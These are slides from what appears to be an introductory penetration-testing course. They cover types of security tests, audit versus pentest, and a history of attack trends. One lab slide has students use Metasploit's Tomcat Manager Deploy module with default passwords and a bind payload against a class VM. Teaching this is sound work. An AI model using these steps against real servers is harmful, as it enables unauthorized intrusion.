6. Definition #1
A Vulnerability is defined as a
weakness which allows an
attacker to reduce a computer
system's security.
7.
8. Types of Security Testing
Network Testing $
Traditional, auditing of services and configuration
Web Application Testing $$
Focus on application type flaws
Web frameworks
Social Engineering $
Attacking users, most resembles real world
9. Types of Security Testing
Physical Testing / Red Teaming $$
A fork of social engineering, much more involved
Binary Analysis / Reverse Engineering / Exploit
Development $$$
Specialty fields
Source Code Auditing $$
Fork of both Web App testing and Binary ninjary
10.
11. 3 Types of Tests
Confusing? A bit…
Audit
Usually network testing, based around some agencies
expectation of what security is. The biggest one is a standard
called PCI.
Usually boring, but bring in lots of money. Usually same skill
sets used.
Very Structured, Sometimes checklist and vulnerability scan
driven.
Can include IT services (Firewall config review, vlan review,
etc)
12. 3 Types of Tests
Assessment
More broad than an audit, doesn’t have to comply with
any agencies expectation of security.
Mile wide, less in depth
Identify as many vulnerabilities as possible
Can include IT services (Firewall config review, vlan
review, etc)
13. 3 Types of Tests
Penetration Test
With all these definitions, tends to get confused
“Pentests” actually test the security controls themselves and
exploit the vulnerabilities.
More goal oriented, prove real threats, get real data as
success factor.
Harder, more expectation of pwnage, most of the time you
have to “get” something.
Usually does NOT include IT services.
We will focus mostly on pentesting… because I think it’s the
most fun but, the skills map across all domains.
15. Lab 1: Trial by fire (metasploit)
Students who are here: access the class VM
• Run ./msfconsole
• Find syntax to use Tomcat Mgr Deploy
• Make sure you updated msf
• Google for default tomcat passwords or read the metasploit ones
• Use generic/tcp/bind payload
• For students who are remote:
• Use Gotmilks guide:
• http://g0tmi1k.blogspot.com/2010/07/video-metasploitable-
tomcat.html
• Congratulations – You just pwned your 1st box! If you have extra time try
and find the flags I’ve placed on the system and pwn a different lab
machine or follow the video above to grab a legit SSH account.
16. A bit about hacking history…
4 Time Periods
Period 1 - In the not so distant past hacking and
attack vectors were largely external.
Core external services were rife with overflows
Password complexity was non existent
Trust relationship vulnerabilities were numerous
Firewalls sucked or were non-existent
The big web vulns were just beginning to be exploited
17. A bit about hacking history…
Period 2 – Things got a bit better, then got worse
External services started to shape up, no more ./’ing the
world.
Passwords got a bit better
Firewalls were big baddies
BUT…
Web Vulns took off… SQL Injection was EVERYWHERE,
Session Fixation, Logic flaws, etc…
Internal software was Swiss Cheese - Attackers
migrated to client-side vectors
18. A bit about hacking history…
Period 3 – Attackers got smart(er)
External services were pretty hard, death of external
hacking and security assessment.
With the death of externals, companies focus on internal
pentests.
Web vulns still prevalent but getting better with
initiatives like OWASP
Internal software was still bad but OS mitigations put a
band aid on some exploits.
Attackers created smarter ways to infect insiders
through web malware
19. A bit about hacking history…
Period 4 – The Current State
External services are very rarely vulnerable.
Web is still around, less in your face though.
Internal software continues to fail, but developing exploits are 2-9
months of research for an 0-day. Much more work.
Focus on internal pentesting assumes the attacker got access somehow.
Internal pentesting is a lot of beating up on the windows domain model,
popping unpatched boxes, abusing current password schemes, using
man-in-the-middle attacks, and internal password fail.
On the client side attackers sometimes use no exploits: javascript
malware, java applet reverse shells, crazy embedding tricks, etc… We are
just beginning to emulate this.
Mobile phones are making the mistakes of yester-year, hot topic right
now
20. So What?
What you’ll see a lot of still being sold in the
industry are:
Web Assessments
Internal Pentests
Source Code Review
Mobile Assessments
The new “External” Pentests which are really Client-Side
Penetration Tests / Social Engineering Assessments /
Web Pentest hybrids